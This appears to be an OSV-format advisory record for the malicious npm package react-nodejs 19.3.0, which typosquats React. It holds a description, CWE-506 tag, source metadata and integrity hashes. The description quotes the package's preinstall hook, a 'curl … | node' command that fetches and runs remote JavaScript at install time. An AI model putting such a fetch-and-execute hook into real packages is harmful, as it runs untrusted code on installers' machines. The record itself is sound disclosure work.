-= Per source details. Do not edit below this line.=-
package.json declares a preinstall lifecycle hook that runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, fetching a JavaScript file from an unrelated third-party Codeberg user's repository on a mutable branch (proxied through web.archive.org) and executing it in Node on the installer's machine at npm install time. The fetched content is unpinned, unverified, and controlled by an account with no relationship to the React publisher. The package additionally impersonates React: name react-nodejs, description copied from React, homepage set to https://react.dev/, and repository pointing at github.com/react/react.git, while being published by an unrelated author — a typosquat lure amplifying the install-time remote code execution.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020688",
"import_time": "2026-09-29T22:41:05.688026468Z",
"modified_time": "2026-09-29T22:18:52Z",
"sha256": "5777ca86863da9fabb9da8e1a0d6c2f30f05533265624b2da07a8d0804930481",
"source": "amazon-inspector",
"versions": [
"19.3.0"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "package.json",
"sha256": "4ce8de223918656f7d92d0d51f7ecb32334d848189225e96e871d43e452fa3c7",
"tlsh": "43210919cda48cb31ad56b9a6c3a1186a31d545f0c493e4cb78a842e5f4d0df50fb21c"
}
],
"package_integrity": [
{
"filename": "react-nodejs-19.3.0.tgz",
"hashes": {
"sha1": "030d07792f9dc3f792a2112fc1ab24d2b43a7a29",
"sha512_sri": "sha512-ATi8XqGT+kcozEl79pCL+ZH5bTfr2+6OeEzB3k/KScvbn9ZGduLcuP819loUvnheFux8uocdLx0Uvox69Ijcpw=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-nodejs/MAL-2026-17294.json"